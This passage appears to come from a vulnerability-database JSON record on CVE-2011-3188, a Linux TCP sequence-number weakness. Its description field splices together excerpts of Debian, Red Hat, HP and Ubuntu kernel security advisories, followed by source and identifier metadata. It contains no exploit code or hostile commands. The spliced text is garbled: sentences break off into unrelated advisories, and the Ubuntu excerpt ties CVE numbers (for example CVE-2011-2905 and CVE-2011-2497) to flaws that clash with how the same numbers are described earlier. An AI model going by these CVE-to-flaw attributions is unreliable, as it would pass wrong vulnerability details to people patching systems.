uninitialized struct\n    elements in the Bluetooth subsystem could lead to a leak of sensitive kernel\n    memory through leaked stack memory. \n\nCVE-2011-2497\n\n    Dan Rosenberg discovered an integer underflow in the Bluetooth subsystem,\n    which could lead to denial of service or privilege escalation. \n\nCVE-2011-2525\n\n    Ben Pfaff reported an issue in the network scheduling code. \n\nCVE-2011-2928\n\n    Timo Warns discovered that insufficient validation of Be filesystem images\n    could lead to local denial of service if a malformed filesystem image is\n    mounted. \n\nCVE-2011-3188\n\n    Dan Kaminsky reported a weakness of the sequence number generation in the\n    TCP protocol implementation. This can be used by remote attackers to inject\n    packets into an active session. \n\nThis update also includes a fix for a regression introduced with the previous\nsecurity fix for CVE-2011-1768 (Debian: #633738)\n\nFor the oldstable distribution (lenny), this problem has been fixed in version\n2.6.26-26lenny4. Updates for arm and alpha are not yet available, but will be\nreleased as soon as possible. Updates for the hppa and ia64 architectures will\nbe included in the upcoming 5.0.9 point release. \n\nThe following matrix lists additional source packages that were rebuilt for\ncompatibility with or to take advantage of this update:\n\n                                             Debian 5.0 (lenny)\n     user-mode-linux                         2.6.26-1um-2+26lenny4\n\nWe recommend that you upgrade your linux-2.6 and user-mode-linux packages. \nHowever, given the high frequency at which low-severity security\nissues are discovered in the kernel and the resource requirements of\ndoing an update, updates for lower priority issues will normally not\nbe released for all kernels at the same time. Rather, they will be\nreleased in a staggered or \"leap-frog\" fashion. Note: To\ncorrect this issue, the RHSA-2011:1241 ecryptfs-utils update must also be\ninstalled. (CVE-2011-2496, Moderate)\n\n* GRO (Generic Receive Offload) fields could be left in an inconsistent\nstate. GRO is enabled by default in all network drivers that\nsupport it. (CVE-2011-2723, Moderate)\n\n* RHSA-2011:1065 introduced a regression in the Ethernet bridge\nimplementation. Xen hypervisor and KVM (Kernel-based\nVirtual Machine) hosts often deploy bridge interfaces. (CVE-2011-2942,\nModerate)\n\n* A flaw in the Xen hypervisor IOMMU error handling implementation could\nallow a privileged guest user, within a guest operating system that has\ndirect control of a PCI device, to cause performance degradation on the\nhost and possibly cause it to hang. The Ubuntu Security Team acknowledges\nVasiliy Kulikov of Openwall and Dan Rosenberg as the original reporters of\nCVE-2011-1833. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: kernel security and bug fix update\nAdvisory ID:       RHSA-2011:1465-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://rhn.redhat.com/errata/RHSA-2011-1465.html\nIssue date:        2011-11-22\nCVE Names:         CVE-2011-1162 CVE-2011-1577 CVE-2011-2494 \n                   CVE-2011-2699 CVE-2011-2905 CVE-2011-3188 \n                   CVE-2011-3191 CVE-2011-3353 CVE-2011-3359 \n                   CVE-2011-3363 CVE-2011-3593 CVE-2011-4326 \n=====================================================================\n\n1. Summary:\n\nUpdated kernel packages that fix multiple security issues and various bugs\nare now available for Red Hat Enterprise Linux 6. \n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - noarch, x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, noarch, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, noarch, x86_64\n\n3. Description:\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system. \n\nThis update fixes the following security issues:\n\n* IPv6 fragment identification value generation could allow a remote\nattacker to disrupt a target system\u0027s networking, preventing legitimate\nusers from accessing its services. (CVE-2011-2699, Important)\n\n* A signedness issue was found in the Linux kernel\u0027s CIFS (Common Internet\nFile System) implementation. A malicious CIFS server could send a\nspecially-crafted response to a directory read request that would result in\na denial of service or privilege escalation on a system that has a CIFS\nshare mounted. (CVE-2011-3191, Important)\n\n* A flaw was found in the way the Linux kernel handled fragmented IPv6 UDP\ndatagrams over the bridge with UDP Fragmentation Offload (UFO)\nfunctionality on. A remote attacker could use this flaw to cause a denial\nof service. (CVE-2011-4326, Important)\n\n* The way IPv4 and IPv6 protocol sequence numbers and fragment IDs were\ngenerated could allow a man-in-the-middle attacker to inject packets and\npossibly hijack connections. Protocol sequence numbers and fragment IDs are\nnow more random. (CVE-2011-3188, Moderate)\n\n* A buffer overflow flaw was found in the Linux kernel\u0027s FUSE (Filesystem\nin Userspace) implementation. A local user in the fuse group who has access\nto mount a FUSE file system could use this flaw to cause a denial of\nservice. (CVE-2011-3353, Moderate)\n\n* A flaw was found in the b43 driver in the Linux kernel. If a system had\nan active wireless interface that uses the b43 driver, an attacker able to\nsend a specially-crafted frame to that interface could cause a denial of\nservice. (CVE-2011-3359, Moderate)\n\n* A flaw was found in the way CIFS shares with DFS referrals at their root\nwere handled. An attacker on the local network who is able to deploy a\nmalicious CIFS server could create a CIFS network share that, when mounted,\nwould cause the client system to crash. (CVE-2011-3363, Moderate)\n\n* A flaw was found in the way the Linux kernel handled VLAN 0 frames with\nthe priority tag set. When using certain network drivers, an attacker on\nthe local network could use this flaw to cause a denial of service. \n(CVE-2011-3593, Moderate)\n\n* A flaw in the way memory containing security-related data was handled in\ntpm_read() could allow a local, unprivileged user to read the results of a\npreviously run TPM command. (CVE-2011-1162, Low)\n\n* A heap overflow flaw was found in the Linux kernel\u0027s EFI GUID Partition\nTable (GPT) implementation. A local attacker could use this flaw to cause\na denial of service by mounting a disk that contains specially-crafted\npartition tables. (CVE-2011-1577, Low)\n\n* The I/O statistics from the taskstats subsystem could be read without\nany restrictions. A local, unprivileged user could use this flaw to gather\nconfidential information, such as the length of a password used in a\nprocess. (CVE-2011-2494, Low)\n\n* It was found that the perf tool, a part of the Linux kernel\u0027s Performance\nEvents implementation, could load its configuration file from the current\nworking directory. If a local user with access to the perf tool were\ntricked into running perf in a directory that contains a specially-crafted\nconfiguration file, it could cause perf to overwrite arbitrary files and\ndirectories accessible to that user. (CVE-2011-2905, Low)\n\nRed Hat would like to thank Fernando Gont for reporting CVE-2011-2699;\nDarren Lavender for reporting CVE-2011-3191; Dan Kaminsky for reporting\nCVE-2011-3188; Yogesh Sharma for reporting CVE-2011-3363; Gideon Naim for\nreporting CVE-2011-3593; Peter Huewe for reporting CVE-2011-1162; Timo\nWarns for reporting CVE-2011-1577; and Vasiliy Kulikov of Openwall for\nreporting CVE-2011-2494. \n\nThis update also fixes various bugs. Documentation for these changes will\nbe available shortly from the Technical Notes document linked to in the\nReferences section. \n\n4. Solution:\n\nUsers should upgrade to these updated packages, which contain\nbackported patches to correct these issues, and fix the bugs noted in\nthe Technical Notes. The system must be rebooted for this update to\ntake effect. \n\nBefore applying this update, make sure all previously-released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to\nuse the Red Hat Network to apply this update are available at\nhttps://access.redhat.com/kb/docs/DOC-11259\n\nTo install kernel packages manually, use \"rpm -ivh [package]\". Do not\nuse \"rpm -Uvh\" as that will remove the running kernel binaries from\nyour system. You may use \"rpm -e\" to remove old kernels after\ndetermining that the new kernel functions properly on your system. \n\n5. Bugs fixed (http://bugzilla.redhat.com/):\n\n695976 - CVE-2011-1577 kernel: corrupted GUID partition tables can cause kernel oops\n716842 - CVE-2011-2494 kernel: taskstats io infoleak\n723429 - CVE-2011-2699 kernel: ipv6: make fragment identifications less predictable\n729808 - CVE-2011-2905 kernel: perf tools: may parse user-controlled configuration file\n732629 - CVE-2011-1162 kernel: tpm: infoleak\n732658 - CVE-2011-3188 kernel: net: improve sequence number generation\n732869 - CVE-2011-3191 kernel: cifs: signedness issue in CIFSFindNext()\n736761 - CVE-2011-3353 kernel: fuse: check size of FUSE_NOTIFY_INVAL_ENTRY message\n738202 - CVE-2011-3359 kernel: b43: allocate receive buffers big enough for max frame len + offset\n738291 - CVE-2011-3363 kernel: cifs: always do is_path_accessible check in cifs_mount\n740352 - make guest mode entry to be rcu quiescent state [rhel-6.1.z]\n741166 - enclosure fix [rhel-6.1.z]\n742846 - CVE-2011-3593 kernel: vlan: fix panic when handling priority tagged frames\n743807 - igb: failed to activate WOL on 2nd LAN port on i350 [rhel-6.1.z]\n744811 - Non-responsive scsi target leads to excessive scsi recovery and dm-mp failover time [rhel-6.1.z]\n748808 - Host got crash when guest running netperf client with UDP_STREAM protocol with IPV6 [rhel-6.1.z]\n755584 - CVE-2011-4326 kernel: wrong headroom check in udp6_ufo_fragment()\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/kernel-2.6.32-131.21.1.el6.src.rpm\n\ni386:\nkernel-2.6.32-131.21.1.el6.i686.rpm\nkernel-debug-2.6.32-131.21.1.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-131.21.1.el6.i686.rpm\nkernel-debug-devel-2.6.32-131.21.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-131.21.1.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-131.21.1.el6.i686.rpm\nkernel-devel-2.6.32-131.21.1.el6.i686.rpm\nkernel-headers-2.6.32-131.21.1.el6.i686.rpm\nperf-2.6.32-131.21.1.el6.i686.rpm\nperf-debuginfo-2.6.32-131.21.1.el6.i686.rpm\n\nnoarch:\nkernel-doc-2.6.32-131.21.1.el6.noarch.rpm\nkernel-firmware-2.6.32-131.21.1.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-131.21.1.el6.x86_64.rpm\nkernel-debug-2.6.32-131.21.1.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-131.21.1.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-131.21.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-131.21.1.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-131.21.1.el6.x86_64.rpm\nkernel-devel-2.6.32-131.21.1.el6.x86_64.rpm\nkernel-headers-2.6.32-131.21.1.el6.x86_64.rpm\nperf-2.6.32-131.21.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-131.21.1.el6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/kernel-2.6.32-131.21.1.el6.src.rpm\n\nnoarch:\nkernel-doc-2.6.32-131.21.1.el6.noarch.rpm\nkernel-firmware-2.6.32-131.21.1.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-131.21.1.el6.x86_64.rpm\nkernel-debug-2.6.32-131.21.1.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-131.21.1.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-131.21.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-131.21.1.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-131.21.1.el6.x86_64.rpm\nkernel-devel-2.6.32-131.21.1.el6.x86_64.rpm\nkernel-headers-2.6.32-131.21.1.el6.x86_64.rpm\nperf-2.6.32-131.21.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-131.21.1.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/kernel-2.6.32-131.21.1.el6.src.rpm\n\ni386:\nkernel-2.6.32-131.21.1.el6.i686.rpm\nkernel-debug-2.6.32-131.21.1.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-131.21.1.el6.i686.rpm\nkernel-debug-devel-2.6.32-131.21.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-131.21.1.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-131.21.1.el6.i686.rpm\nkernel-devel-2.6.32-131.21.1.el6.i686.rpm\nkernel-headers-2.6.32-131.21.1.el6.i686.rpm\nperf-2.6.32-131.21.1.el6.i686.rpm\nperf-debuginfo-2.6.32-131.21.1.el6.i686.rpm\n\nnoarch:\nkernel-doc-2.6.32-131.21.1.el6.noarch.rpm\nkernel-firmware-2.6.32-131.21.1.el6.noarch.rpm\n\nppc64:\nkernel-2.6.32-131.21.1.el6.ppc64.rpm\nkernel-bootwrapper-2.6.32-131.21.1.el6.ppc64.rpm\nkernel-debug-2.6.32-131.21.1.el6.ppc64.rpm\nkernel-debug-debuginfo-2.6.32-131.21.1.el6.ppc64.rpm\nkernel-debug-devel-2.6.32-131.21.1.el6.ppc64.rpm\nkernel-debuginfo-2.6.32-131.21.1.el6.ppc64.rpm\nkernel-debuginfo-common-ppc64-2.6.32-131.21.1.el6.ppc64.rpm\nkernel-devel-2.6.32-131.21.1.el6.ppc64.rpm\nkernel-headers-2.6.32-131.21.1.el6.ppc64.rpm\nperf-2.6.32-131.21.1.el6.ppc64.rpm\nperf-debuginfo-2.6.32-131.21.1.el6.ppc64.rpm\n\ns390x:\nkernel-2.6.32-131.21.1.el6.s390x.rpm\nkernel-debug-2.6.32-131.21.1.el6.s390x.rpm\nkernel-debug-debuginfo-2.6.32-131.21.1.el6.s390x.rpm\nkernel-debug-devel-2.6.32-131.21.1.el6.s390x.rpm\nkernel-debuginfo-2.6.32-131.21.1.el6.s390x.rpm\nkernel-debuginfo-common-s390x-2.6.32-131.21.1.el6.s390x.rpm\nkernel-devel-2.6.32-131.21.1.el6.s390x.rpm\nkernel-headers-2.6.32-131.21.1.el6.s390x.rpm\nkernel-kdump-2.6.32-131.21.1.el6.s390x.rpm\nkernel-kdump-debuginfo-2.6.32-131.21.1.el6.s390x.rpm\nkernel-kdump-devel-2.6.32-131.21.1.el6.s390x.rpm\nperf-2.6.32-131.21.1.el6.s390x.rpm\nperf-debuginfo-2.6.32-131.21.1.el6.s390x.rpm\n\nx86_64:\nkernel-2.6.32-131.21.1.el6.x86_64.rpm\nkernel-debug-2.6.32-131.21.1.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-131.21.1.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-131.21.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-131.21.1.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-131.21.1.el6.x86_64.rpm\nkernel-devel-2.6.32-131.21.1.el6.x86_64.rpm\nkernel-headers-2.6.32-131.21.1.el6.x86_64.rpm\nperf-2.6.32-131.21.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-131.21.1.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/kernel-2.6.32-131.21.1.el6.src.rpm\n\ni386:\nkernel-2.6.32-131.21.1.el6.i686.rpm\nkernel-debug-2.6.32-131.21.1.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-131.21.1.el6.i686.rpm\nkernel-debug-devel-2.6.32-131.21.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-131.21.1.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-131.21.1.el6.i686.rpm\nkernel-devel-2.6.32-131.21.1.el6.i686.rpm\nkernel-headers-2.6.32-131.21.1.el6.i686.rpm\nperf-2.6.32-131.21.1.el6.i686.rpm\nperf-debuginfo-2.6.32-131.21.1.el6.i686.rpm\n\nnoarch:\nkernel-doc-2.6.32-131.21.1.el6.noarch.rpm\nkernel-firmware-2.6.32-131.21.1.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-131.21.1.el6.x86_64.rpm\nkernel-debug-2.6.32-131.21.1.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-131.21.1.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-131.21.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-131.21.1.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-131.21.1.el6.x86_64.rpm\nkernel-devel-2.6.32-131.21.1.el6.x86_64.rpm\nkernel-headers-2.6.32-131.21.1.el6.x86_64.rpm\nperf-2.6.32-131.21.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-131.21.1.el6.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and \ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2011-1162.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-1577.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-2494.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-2699.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-2905.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-3188.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-3191.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-3353.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-3359.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-3363.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-3593.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-4326.html\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://docs.redhat.com/docs/en-US/Red_Hat_Enterprise_Linux/6/html/6.1_Technical_Notes/kernel.html#RHSA-2011-1465\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e.  More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2011 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.4 (GNU/Linux)\n\niD8DBQFOy9KxXlSAg2UNWIIRApHRAKCrfJt7aIrWnGPf3TwUZKtul/8YUgCgtpZE\nl5BuL6rArAsWl76KlBJjWFw=\n=0G9b\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04135307\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04135307\nVersion: 1\n\nHPSBGN02970 rev.1 - HP Rapid Deployment Pack (RDP) or HP Insight Control\nServer Deployment, Multiple Remote Vulnerabilities affecting Confidentiality,\nIntegrity and Availability\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2014-03-10\nLast Updated: 2014-03-10\n\nPotential Security Impact: Multiple remote vulnerabilities affecting\nconfidentiality, integrity and availability\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential vulnerabilities have been identified with HP Rapid Deployment Pack\n(RDP) or HP Insight Control Server Deployment. The vulnerabilities could be\nexploited remotely affecting confidentiality, integrity and availability. \n\nReferences: CVE-2010-4008\n CVE-2010-4494\n CVE-2011-2182\n CVE-2011-2213\n CVE-2011-2492\n\nCVE-2011-2518\n CVE-2011-2689\n CVE-2011-2723\n CVE-2011-3188\n CVE-2011-4077\n\nCVE-2011-4110\n CVE-2012-0058\n CVE-2012-0879\n CVE-2012-1088\n CVE-2012-1179\n\nCVE-2012-2137\n CVE-2012-2313\n CVE-2012-2372\n CVE-2012-2373\n CVE-2012-2375\n\nCVE-2012-2383\n CVE-2012-2384\n CVE-2013-6205\n CVE-2013-6206\n SSRT101443\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\nHP Rapid Deployment Pack (RDP) -- All versions\nHP Insight Control Server Deployment -- All versions\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n  Reference              Base Vector             Base Score\nCVE-2013-6205    (AV:L/AC:M/Au:S/C:P/I:P/A:P)        4.1\nCVE-2013-6206    (AV:N/AC:L/Au:N/C:C/I:P/A:P)        9.0\nCVE-2010-4008    (AV:N/AC:M/Au:N/C:N/I:N/A:P)        4.3\nCVE-2010-4494    (AV:N/AC:L/Au:N/C:C/I:C/A:C)       10.0\nCVE-2011-2182    (AV:L/AC:L/Au:N/C:C/I:C/A:C)        7.2\nCVE-2011-2213    (AV:L/AC:L/Au:N/C:N/I:N/A:C)        4.9\nCVE-2011-2492    (AV:L/AC:M/Au:N/C:P/I:N/A:N)        1.9\nCVE-2011-2518    (AV:L/AC:L/Au:N/C:N/I:N/A:C)        4.9\nCVE-2011-2689    (AV:L/AC:L/Au:N/C:N/I:N/A:C)        4.9\nCVE-2011-2723    (AV:A/AC:M/Au:N/C:N/I:N/A:C)        5.7\nCVE-2011-3188    (AV:N/AC:M/Au:N/C:P/I:P/A:P)        6.8\nCVE-2011-4077    (AV:L/AC:M/Au:N/C:C/I:C/A:C)        6.9\nCVE-2011-4110    (AV:L/AC:L/Au:N/C:N/I:N/A:P)        2.1\nCVE-2012-0058    (AV:L/AC:L/Au:N/C:N/I:N/A:C)        4.9\nCVE-2012-0879    (AV:L/AC:L/Au:N/C:N/I:N/A:C)        4.9\nCVE-2012-1088    (AV:L/AC:M/Au:N/C:N/I:P/A:P)        3.3\nCVE-2012-1179    (AV:A/AC:M/Au:S/C:N/I:N/A:C)        5.2\nCVE-2012-2137    (AV:L/AC:M/Au:N/C:C/I:C/A:C)        6.9\nCVE-2012-2313    (AV:L/AC:H/Au:N/C:N/I:N/A:P)        1.2\nCVE-2012-2372    (AV:L/AC:M/Au:S/C:N/I:N/A:C)        4.4\nCVE-2012-2373    (AV:L/AC:H/Au:N/C:N/I:N/A:C)        4.0\nCVE-2012-2375    (AV:A/AC:H/Au:N/C:N/I:N/A:C)        4.6\nCVE-2012-2383    (AV:L/AC:L/Au:N/C:N/I:N/A:C)        4.9\nCVE-2012-2384    (AV:L/AC:L/Au:N/C:N/I:N/A:C)        4.9\n===========================================================\n             Information on CVSS is documented\n            in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP recommends that HP Rapid Deployment Pack (RDP) or HP Insight Control\nServer Deployment should only be run on private secure networks to prevent\nthe risk of security compromise. \n\nHISTORY\nVersion:1 (rev.1) - 10 March 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel.  For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2014 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. \n\nSoftware Description:\n- linux-mvl-dove: Linux kernel for DOVE\n\nDetails:\n\nRyan Sweat discovered that the kernel incorrectly handled certain VLAN\npackets. (CVE-2011-1833)\n\nVasiliy Kulikov discovered that taskstats did not enforce access\nrestrictions. A local attacker could exploit this to read certain\ninformation, leading to a loss of privacy. (CVE-2011-2494)\n\nVasiliy Kulikov discovered that /proc/PID/io did not enforce access\nrestrictions. A local attacker could exploit this to read certain\ninformation, leading to a loss of privacy. (CVE-2011-2497)\n\nIt was discovered that the EXT4 filesystem contained multiple off-by-one\nflaws. (CVE-2011-2695)\n\nFernando Gont discovered that the IPv6 stack used predictable fragment\nidentification numbers. \n(CVE-2011-2905)\n\nTime Warns discovered that long symlinks were incorrectly handled on Be\nfilesystems. A remote attacker with a malicious server could exploit this\nto crash the system or possibly execute arbitrary code as the root user. \n(CVE-2011-3191)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 10.04 LTS:\n  linux-image-2.6.32-219-dove     2.6.32-219.37\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. Unless you\nmanually uninstalled the standard kernel metapackages (e.g. linux-generic,\nlinux-server, linux-powerpc), a standard system upgrade will automatically\nperform this as well",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2011-3188"
      },
      {
        "db": "VULHUB",
        "id": "VHN-51133"
      },
      {
        "db": "VULMON",
        "id": "CVE-2011-3188"
      },
      {
        "db": "PACKETSTORM",
        "id": "105308"
      },
      {
        "db": "PACKETSTORM",
        "id": "105455"
      },
      {
        "db": "PACKETSTORM",
        "id": "106032"
      },
      {
        "db": "PACKETSTORM",
        "id": "107225"
      },
      {
        "db": "PACKETSTORM",
        "id": "125636"
      },
      {
        "db": "PACKETSTORM",
        "id": "106207"
      },
      {
        "db": "PACKETSTORM",
        "id": "106206"
      },
      {
        "db": "PACKETSTORM",
        "id": "106201"
      }
    ],
    "trust": 1.8
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-51133",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-51133"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2011-3188",
        "trust": 2.7
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2011/08/23/2",
        "trust": 1.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201108-429",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4751",
        "trust": 0.6
      },
      {
        "db": "BID",
        "id": "49289",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "106496",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-51133",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2011-3188",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "116124",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "105308",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "105455",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "106032",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "107225",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "125636",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "106207",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "106206",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "106201",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-51133"
      },
      {
        "db": "VULMON",
        "id": "CVE-2011-3188"
      },
      {
        "db": "PACKETSTORM",
        "id": "116124"
      },
      {
        "db": "PACKETSTORM",
        "id": "105308"
      },
      {
        "db": "PACKETSTORM",
        "id": "105455"
      },
      {
        "db": "PACKETSTORM",
        "id": "106032"
      },
      {
        "db": "PACKETSTORM",
        "id": "107225"
      },
      {
        "db": "PACKETSTORM",
        "id": "125636"
      },
      {
        "db": "PACKETSTORM",
        "id": "106207"
      },
      {
        "db": "PACKETSTORM",
        "id": "106206"
      },
      {
        "db": "PACKETSTORM",
        "id": "106201"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201108-429"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-3188"
      }
    ]
  },
  "id": "VAR-201205-0016",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-51133"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-07-23T21:11:14.011000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "linux-3.3.7",
        "trust": 0.6,
